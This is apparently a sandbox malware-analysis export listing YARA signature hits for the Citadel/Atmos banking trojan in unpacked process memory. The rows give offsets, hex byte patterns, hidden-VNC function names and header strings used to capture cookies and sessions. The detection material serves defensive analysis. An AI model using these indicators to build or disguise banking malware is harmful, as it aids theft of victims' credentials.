8.3.StartMenuExperienceHost.exe.b50000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
8.3.StartMenuExperienceHost.exe.b50000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 B5 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 B5 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 B5 00
8.3.StartMenuExperienceHost.exe.b50000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
31.2.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
31.2.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
31.2.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
31.2.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
1.3.nyheukpo.exe.20f0000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12b39:$MZ: 4D 5A 0x140c7:$MZ: 4D 5A 0x3e608:$MZ: 4D 5A 0x3dcd4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 40 00 57 33 DB BF 00 28 00 00 0x3dd78:$b: 68 C8 00 00 00 FF 15 4C 12 40 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2ec20:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2ec40:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3db27:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 40 00
35.2.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
35.2.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
35.2.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
35.2.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
25.3.dllhost.exe.ac0000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
25.3.dllhost.exe.ac0000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
25.3.dllhost.exe.ac0000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
25.3.dllhost.exe.ac0000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 AC 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 AC 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 AC 00
25.3.dllhost.exe.ac0000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
16.0.TextInputHost.exe.580000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
16.0.TextInputHost.exe.580000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
16.0.TextInputHost.exe.580000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
16.0.TextInputHost.exe.580000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 58 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 58 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 58 00
16.0.TextInputHost.exe.580000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
10.0.SearchApp.exe.a90000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
10.0.SearchApp.exe.a90000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
10.0.SearchApp.exe.a90000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
10.0.SearchApp.exe.a90000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 A9 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 A9 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 A9 00
10.0.SearchApp.exe.a90000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
37.0.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
37.0.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
37.0.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
37.0.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 C9 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 C9 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 C9 00
37.0.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
18.3.RuntimeBroker.exe.900000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
18.3.RuntimeBroker.exe.900000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
18.3.RuntimeBroker.exe.900000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
18.3.RuntimeBroker.exe.900000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 90 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 90 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 90 00
18.3.RuntimeBroker.exe.900000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
21.3.RuntimeBroker.exe.190000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
21.3.RuntimeBroker.exe.190000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
21.3.RuntimeBroker.exe.190000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
21.3.RuntimeBroker.exe.190000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 19 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 19 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 19 00
21.3.RuntimeBroker.exe.190000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
0.2.services.png.exe.2810000.1.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
0.2.services.png.exe.2810000.1.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
0.2.services.png.exe.2810000.1.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
0.2.services.png.exe.2810000.1.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
16.3.TextInputHost.exe.580000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
16.3.TextInputHost.exe.580000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
16.3.TextInputHost.exe.580000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
16.3.TextInputHost.exe.580000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 58 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 58 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 58 00
16.3.TextInputHost.exe.580000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
19.0.ApplicationFrameHost.exe.180000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
19.0.ApplicationFrameHost.exe.180000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
19.0.ApplicationFrameHost.exe.180000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
